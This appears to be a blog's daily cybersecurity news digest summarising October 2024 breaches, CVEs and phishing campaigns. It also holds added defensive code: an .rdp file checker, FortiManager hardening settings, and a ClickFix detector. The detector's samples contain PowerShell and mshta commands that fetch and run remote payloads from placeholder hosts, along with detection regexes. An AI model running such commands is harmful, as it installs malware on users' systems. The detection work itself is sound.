Essential Cyber Intel Brief: 10/27/2024

In today’s connected world, cyber threats are escalating rapidly, making it critical to stay informed. On October 26, 2024, I launched a Python-powered tracking program to quickly compile the most important cybersecurity events and breaches from trusted sources like Krebs on Security, The Hacker News, Security Week, and others.

No one has time to sift through dozens of websites for critical insights. That’s why I developed a better solution—automated, curated, and absolutely free. Stay ahead with concise updates pulled from trusted sources, without the hassle.

Designed for efficiency, my new program pinpoints the most critical cybersecurity events security professionals and business leaders need to know today. In just one to two minutes, you’ll determine if the latest developments require further attention, allowing you to stay informed and focused without disruption.

Breach-related content is highlighted in yellow for easy scanning. I also have a dedicated 2024 cybersecurity breach news page that you can quickly review.

Subscribe to my website to receive automated notifications and stay ahead of key developments—no spam, just concise, relevant updates delivered directly to your inbox.

You can connect with me on LinkedIn and join my professional network.

PS-

Most of the updates won't involve this much information. I am tuning the system to establish the baseline, and these updates today are a means to get caught up. I didn't want to leave out important information, so I included it for your review.

10/27/2024 – New Cybersecurity Updates

ID: 24

Summary: Sudanese Brothers Arrested in ‘AnonSudan’ Takedown – The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers. One of the brothers is facing life in prison for allegedly seeking to kill people with his attacks.

Date: 2024-10-17

URL: https://krebsonsecurity.com/2024/10/sudanese-brothers-arrested-in-anonsudan-takedown/


ID: 25

Summary: This Windows PowerShell Phish Has Scary Potential – Many GitHub users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware. While it’s unlikely that many programmers fell for this scam, it’s notable because less targeted versions of it are likely to be far more successful against the average Windows user.

Date: 2024-09-19

URL: https://krebsonsecurity.com/2024/09/this-windows-powershell-phish-has-scary-potential/


ID: 26

Summary: Over 70 zero-day flaws get hackers $1 million at Pwn2Own Ireland – The fourth day of Pwn2Own Ireland 2024 marked the end of the hacking competition with more than $1 million in prizes for over 70 unique zero-day vulnerabilities in fully patched devices. […]

Date: 2024-10-26

URL: https://www.bleepingcomputer.com/news/security/over-70-zero-day-flaws-get-hackers-1-million-at-pwn2own-ireland/


ID: 27

Summary: QNAP, Synology, Lexmark devices hacked on Pwn2Own Day 3 – The third day of Pwn2Own Ireland 2024 continued to showcase the expertise of white hat hackers as they exposed 11 zero-day vulnerabilities, adding $124,750 to the total prize pool, which now stands at $874,875. […]

Date: 2024-10-25

URL: https://www.bleepingcomputer.com/news/security/qnap-synology-lexmark-devices-hacked-on-pwn2own-day-3/


ID: 28

Summary: CERT-UA Identifies Malicious RDP Files in Latest Attack on Ukrainian Entities – The Computer Emergency Response Team of Ukraine (CERT-UA) has detailed a new malicious email campaign targeting government agencies, enterprises, and military entities.

“The messages exploit the appeal of integrating popular services like Amazon or Microsoft and implementing a zero-trust architecture,” CERT-UA said. “These emails contain attachments in the form of Remote Desktop Protocol (‘.rdp’

Date: 2024-10-26

URL: https://thehackernews.com/2024/10/cert-ua-identifies-malicious-rdp-files.html
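The attachment type in this entry is an ordinary text file of key:type:value lines that the Remote Desktop client reads when opened. A file that points the victim at an attacker-controlled server and turns on resource redirection gives that server access to the victim's drives, clipboard, printers and smart cards for as long as the session lasts, with no exploit involved. The checker below is an added example, not code from CERT-UA or from the page; the .rdp content it inspects is constructed, and the trusted-domain suffix is an assumed allow-list you would replace with your own.

```python
"""Parse a Remote Desktop (.rdp) file and flag settings that hand the
remote server access to the local machine.  Added example, not from the
page; SAMPLE_RDP is constructed."""
from typing import Dict, List, Tuple

# (key, value) pairs that enable redirection of a local resource to the
# remote host.  'i' keys hold integers, 's' keys strings; the RDP client
# treats key names case-insensitively.
REDIRECTION_ENABLED = {
    "redirectdrives": "1",
    "drivestoredirect": "*",
    "redirectclipboard": "1",
    "redirectprinters": "1",
    "redirectsmartcards": "1",
    "redirectcomports": "1",
    "redirectwebauthn": "1",
    "devicestoredirect": "*",
}


def parse_rdp(text: str) -> Dict[str, str]:
    """Return {key: value} for every 'key:type:value' line.

    Blank lines, ';' comments and malformed lines are skipped rather than
    raising, so a deliberately odd file still gets inspected.
    """
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(":", 2)          # the value may itself contain ':'
        if len(parts) != 3 or parts[1] not in ("s", "i", "b"):
            continue
        key, _type, value = parts
        settings[key.strip().lower()] = value.strip()
    return settings


def assess_rdp(text: str,
               trusted_suffixes: Tuple[str, ...] = ("corp.example",)) -> List[str]:
    """List the reasons an .rdp file should not be opened blindly."""
    s = parse_rdp(text)
    findings: List[str] = []

    # 'full address' is host or host:port (name/IPv4 only here; IPv6 would
    # need bracket handling).  trusted_suffixes is an assumed allow-list.
    host = s.get("full address", "").rsplit(":", 1)[0].lower()
    if host and not host.endswith(trusted_suffixes):
        findings.append(f"connects to untrusted host {host!r}")

    for key, enabled in REDIRECTION_ENABLED.items():
        if s.get(key) == enabled:
            findings.append(f"{key} is enabled: local resource shared with remote host")

    # Level 0 connects even when the server certificate fails validation.
    if s.get("authentication level") == "0":
        findings.append("authentication level 0: certificate warnings are suppressed")
    return findings


# Constructed sample modelled on the attachment type in this entry; not a real capture.
SAMPLE_RDP = """\
; constructed sample
full address:s:aws-zero-trust-test.example.net:3389
username:s:
redirectdrives:i:1
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
authentication level:i:0
prompt for credentials:i:0
"""

if __name__ == "__main__":
    for finding in assess_rdp(SAMPLE_RDP):
        print("-", finding)
```

Run it against any .rdp attachment before double-clicking; a file from a mail gateway that enables drive redirection toward a host outside your own domains should be treated as malicious regardless of how plausible the sender looks.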


ID: 29

Summary: Researchers Discover Command Injection Flaw in Wi-Fi Alliance’s Test Suite – A security flaw impacting the Wi-Fi Test Suite could enable unauthenticated local attackers to execute arbitrary code with elevated privileges.

The CERT Coordination Center (CERT/CC) said the vulnerability, tracked as CVE-2024-41992, stems from susceptible Wi-Fi Alliance code that has been found deployed on Arcadyan FMIMG51AX000J routers.

Date: 2024-10-25

URL: https://thehackernews.com/2024/10/researchers-discover-command-injection.html


ID: 30

Summary: AWS Cloud Development Kit Vulnerability Exposes Users to Potential Account Takeover Risks – Cybersecurity researchers have disclosed a security flaw impacting Amazon Web Services (AWS) Cloud Development Kit (CDK) that could have resulted in an account takeover under specific circumstances.

Date: 2024-10-24

URL: https://thehackernews.com/2024/10/aws-cloud-development-kit-vulnerability.html


ID: 31

Summary: Cisco Issues Urgent Fix for ASA and FTD Software Vulnerability Under Active Attack – Cisco on Wednesday said it has released updates to address an actively exploited security flaw in its Adaptive Security Appliance (ASA) that could lead to a denial-of-service (DoS) condition.

The vulnerability, tracked as CVE-2024-20481 (CVSS score: 5.8), affects the Remote Access VPN (RAVPN) service of Cisco ASA and Cisco Firepower Threat Defense (FTD) Software.

Date: 2024-10-24

URL: https://thehackernews.com/2024/10/cisco-issues-urgent-fix-for-asa-and-ftd.html


ID: 32

Summary: Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA – Sometimes, it turns out that the answers we struggled so hard to find were sitting right in front of us for so long that we somehow overlooked them.

When the Department of Homeland Security, through the Cybersecurity and Infrastructure Security Agency (CISA), in coordination with the FBI, issues a cybersecurity warning and prescribes specific action, it’s a pretty good idea to at least read the

Date: 2024-10-24

URL: https://thehackernews.com/2024/10/why-phishing-resistant-mfa-is-no-longer.html


ID: 33

Summary: Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices – The North Korean threat actor known as Lazarus Group has been attributed to the zero-day exploitation of a now-patched security flaw in Google Chrome to seize control of infected devices.

Cybersecurity vendor Kaspersky said it discovered a novel attack chain in May 2024 that targeted the personal computer of an unnamed Russian national with the Manuscrypt backdoor.

Date: 2024-10-24

URL: https://thehackernews.com/2024/10/lazarus-group-exploits-google-chrome.html


ID: 34

Summary: Fortinet Warns of Critical Vulnerability in FortiManager Under Active Exploitation – Fortinet has confirmed details of a critical security flaw impacting FortiManager that has come under active exploitation in the wild.

Tracked as CVE-2024-47575 (CVSS score: 9.8), the vulnerability is also known as FortiJump and is rooted in the FortiGate to FortiManager (FGFM) protocol.

Date: 2024-10-24

URL: https://thehackernews.com/2024/10/fortinet-warns-of-critical.html
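FGFM is the channel FortiGate devices use to register with and be managed by FortiManager, so the exposure in this entry is the listener that accepts those registrations (TCP 541). Fortinet's advisory for this CVE lists, alongside upgrading, a setting that refuses registration from devices whose serial numbers FortiManager does not already know, and recommends a local-in policy restricting which source addresses may reach that port at all. The fragment below shows the weak default beside the hardened setting in FortiManager CLI form as an added example; it is not quoted from the page, the option is not present on older release branches, and enabling it breaks auto-registration of new FortiGates, which is fine for most deployments but must be checked first.

```text
# Default: any device that can reach TCP/541 may attempt to register (weak)
config system global
    set fgfm-deny-unknown disable
end

# Hardened: refuse registration from serial numbers FortiManager does not already know
config system global
    set fgfm-deny-unknown enable
end
```

Pair the setting with a local-in policy that accepts TCP/541 only from your FortiGates' addresses and denies everything else, and review FortiManager for unknown devices that registered before the change.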


ID: 35

Summary: New Grandoreiro Banking Malware Variants Emerge with Advanced Tactics to Evade Detection – New variants of a banking malware called Grandoreiro have been found to adopt new tactics in an effort to bypass anti-fraud measures, indicating that the malicious software is continuing to be actively developed despite law enforcement efforts to crack down on the operation.

Date: 2024-10-23

URL: https://thehackernews.com/2024/10/new-grandoreiro-banking-malware.html


ID: 36

Summary: CISA Warns of Active Exploitation of Microsoft SharePoint Vulnerability (CVE-2024-38094) – A high-severity flaw impacting Microsoft SharePoint has been added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday, citing evidence of active exploitation.

Date: 2024-10-23

URL: https://thehackernews.com/2024/10/cisa-warns-of-active-exploitation-of.html


ID: 37

Summary: Gophish Framework Used in Phishing Campaigns to Deploy Remote Access Trojans – Russian-speaking users have become the target of a new phishing campaign that leverages an open-source phishing toolkit called Gophish to deliver DarkCrystal RAT (aka DCRat) and a previously undocumented remote access trojan dubbed PowerRAT.

Date: 2024-10-22

URL: https://thehackernews.com/2024/10/gophish-framework-used-in-phishing.html


ID: 38

Summary: Security Flaw in Styra’s OPA Exposes NTLM Hashes to Remote Attackers – Details have emerged about a now-patched security flaw in Styra’s Open Policy Agent (OPA) that, if successfully exploited, could have led to leakage of New Technology LAN Manager (NTLM) hashes.

Date: 2024-10-22

URL: https://thehackernews.com/2024/10/security-flaw-in-styras-opa-exposes.html


ID: 39

Summary: VMware Releases vCenter Server Update to Fix Critical RCE Vulnerability – VMware has released new software updates for a previously patched security flaw in vCenter Server that could pave the way for remote code execution, after determining that the original fix did not fully address it.

The vulnerability, tracked as CVE-2024-38812 (CVSS score: 9.8), is a heap-overflow bug in the implementation of the DCE/RPC protocol.

Date: 2024-10-22

URL: https://thehackernews.com/2024/10/vmware-releases-vcenter-server-update.html


ID: 40

Summary: CISA Adds ScienceLogic SL1 Vulnerability to Exploited Catalog After Active Zero-Day Attack – The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical security flaw impacting ScienceLogic SL1 to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation as a zero-day.

The vulnerability in question, tracked as CVE-2024-9537 (CVSS v4 score: 9.3), refers to a bug involving an unspecified third-party component.

Date: 2024-10-22

URL: https://thehackernews.com/2024/10/cisa-adds-sciencelogic-sl1.html


ID: 41

Summary: Hackers are using new tricks to break into systems we thought were secure—like finding hidden doors in locked houses. But the good news? Security experts are fighting back with smarter tools to keep data safe.

Date: 2024-10-21

URL: https://thehackernews.com/2024/10/thn-cybersecurity-recap-top-threats_21.html


ID: 42

Summary: Researchers Discover Severe Security Flaws in Major E2EE Cloud Storage Providers – Cybersecurity researchers have discovered severe cryptographic issues in various end-to-end encrypted (E2EE) cloud storage platforms that could be exploited to leak sensitive data.

Date: 2024-10-21

URL: https://thehackernews.com/2024/10/researchers-discover-severe-security.html


ID: 43

Summary: Hackers Exploit Roundcube Webmail XSS Vulnerability to Steal Login Credentials – Unknown threat actors have been observed attempting to exploit a now-patched security flaw in the open-source Roundcube webmail software as part of a phishing attack designed to steal user credentials.

Date: 2024-10-20

URL: https://thehackernews.com/2024/10/hackers-exploit-roundcube-webmail-xss.html


ID: 44

Summary: Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign – Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems.

“This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems,”

Date: 2024-10-18

URL: https://thehackernews.com/2024/10/beware-fake-google-meet-pages-deliver.html
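The GitHub phishing wave (ID 25) and the fake Google Meet pages in this entry rely on the same move: the user opens the Run dialog with Win+R, pastes a command the page placed on the clipboard, and presses Enter. Two artefacts follow from that on the endpoint: a process-creation event for powershell.exe or mshta.exe whose parent is explorer.exe, and the pasted text in the Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where each value is stored with a trailing "\1". The detector below is an added example, not code from the page or from any vendor named in it; the Sysmon-style events and RunMRU values are constructed, and the indicator list is a starting point rather than a complete signature set.

```python
"""Detect ClickFix-style 'paste this into Win+R' execution from
process-creation events and Run-dialog history (RunMRU).  Added example,
not from the page; SAMPLE_EVENTS and SAMPLE_RUNMRU are constructed."""
import re
from typing import Dict, Iterable, List, Tuple

# Binaries the lure commands use to fetch and run the stage-two payload.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "wscript.exe", "cscript.exe"}

# Fragments a real user almost never types into the Run box by hand.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:in(?:dowstyle)?)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(?:iex|invoke-expression)\b|downloadstring\(|\bnet\.webclient\b", re.I),
    "remote_hta":      re.compile(r"mshta(?:\.exe)?\s+https?://", re.I),
    "bypass_policy":   re.compile(r"-e(?:xec(?:utionpolicy)?|p)\s+bypass", re.I),
}


def score_command(cmdline: str) -> List[str]:
    """Names of every indicator that matches the command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def flag_process_events(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag Sysmon Event ID 1 style records (ParentImage/Image/CommandLine).

    Parent is recorded for context: explorer.exe as parent is what the Run
    dialog produces, but an admin typing 'cmd' there is normal, so the
    decision rests on the command-line indicators, not on the parent.
    """
    hits: List[Dict[str, object]] = []
    for ev in events:
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if image not in LOLBINS:
            continue
        cmd = ev.get("CommandLine", "")
        reasons = score_command(cmd)
        if not reasons:
            continue
        hits.append({
            "Image": image,
            "Parent": ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower(),
            "CommandLine": cmd,
            "Indicators": reasons,
        })
    return hits


def flag_runmru(values: Dict[str, str]) -> List[Tuple[str, str, List[str]]]:
    """Score RunMRU values (name -> stored string). 'MRUList' holds the
    ordering, not a command; every other value ends in a literal '\\1'."""
    out: List[Tuple[str, str, List[str]]] = []
    for name, stored in values.items():
        if name == "MRUList":
            continue
        cmd = stored[:-2] if stored.endswith("\\1") else stored
        reasons = score_command(cmd)
        if reasons:
            out.append((name, cmd, reasons))
    return out


# Constructed Sysmon Event ID 1 style records (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://verify-captcha.example/p.ps1)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://meet-google.example/verify"},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign Run-box use
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c ipconfig /all"},
    {"ParentImage": r"C:\Program Files\Git\bin\git.exe",  # benign automation
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File build.ps1"},
]

# Constructed RunMRU export (values as stored under the key named above).
SAMPLE_RUNMRU = {
    "a": r'powershell -w hidden -c "iex (irm https://verify-captcha.example/p.ps1)"\1',
    "b": r"notepad\1",
    "c": r"mshta https://meet-google.example/verify\1",
    "MRUList": "cab",
}

if __name__ == "__main__":
    for hit in flag_process_events(SAMPLE_EVENTS):
        print("process:", hit["Image"], "<-", hit["Parent"], hit["Indicators"])
    for name, cmd, reasons in flag_runmru(SAMPLE_RUNMRU):
        print("RunMRU", name, reasons, cmd)
```

On a live host the RunMRU values come from `reg query` or a registry hive export and the events from your EDR or Sysmon pipeline; the RunMRU check is the useful one after the fact, because it survives even when the malware cleans up the process it launched.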


ID: 45

Summary: Microsoft Reveals macOS Vulnerability that Bypasses Privacy Controls in Safari Browser – Microsoft has disclosed details about a now-patched security flaw in Apple’s Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user’s privacy preferences and access data.

The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133 (CVSS score: 5.5). It was addressed by Apple as part of macOS Sequoia 15.

Date: 2024-10-18

URL: https://thehackernews.com/2024/10/microsoft-reveals-macos-vulnerability.html


ID: 46

Summary: U.S. Charges Two Sudanese Brothers for Record 35,000 DDoS Attacks – Federal prosecutors in the U.S. have charged two Sudanese brothers with running a distributed denial-of-service (DDoS) botnet for hire that conducted a record 35,000 DDoS attacks in a single year, including those that targeted Microsoft’s services in June 2023.

Date: 2024-10-17

URL: https://thehackernews.com/2024/10/us-charges-two-sudanese-brothers-for.html


ID: 47

Summary: Critical Kubernetes Image Builder Vulnerability Exposes Nodes to Root Access Risk – A critical security flaw has been disclosed in the Kubernetes Image Builder that, if successfully exploited, could be abused to gain root access under certain circumstances.

The vulnerability, tracked as CVE-2024-9486 (CVSS score: 9.8), has been addressed in version 0.1.38. The project maintainers acknowledged Nicolai Rybnikar for discovering and reporting the vulnerability.

Date: 2024-10-17


ID: 53

Summary: Landmark Admin Discloses Data Breach Impacting 800,000 People – Insurance administrator Landmark Admin says personal information was stolen in a ransomware attack earlier this year.

Date: 2024-10-25

URL: https://www.securityweek.com/landmark-admin-discloses-data-breach-impacting-800000-people/


ID: 54

Summary: Change Healthcare Ransomware Attack Impacts 100 Million People – UnitedHealth told the US health department that hackers stole the information of 100 million people in a February ransomware attack.

Date: 2024-10-25

URL: https://www.securityweek.com/change-healthcare-ransomware-attack-impacts-100-million-people/


ID: 55

Summary: AWS Seizes Domains Used by Russia’s APT29 – AWS announced the seizure of domains used by Russian hacker group APT29 in phishing attacks targeting Ukraine and other countries.

Date: 2024-10-25

URL: https://www.securityweek.com/aws-seizes-domains-used-by-russias-apt29/


ID: 56

Summary: OnePoint Patient Care Data Breach Impacts Nearly 800,000 People – OnePoint Patient Care has disclosed a data breach impacting the personal information of nearly 800,000 individuals.

Date: 2024-10-25

URL: https://www.securityweek.com/onepoint-patient-care-data-breach-impacts-nearly-800000-people/
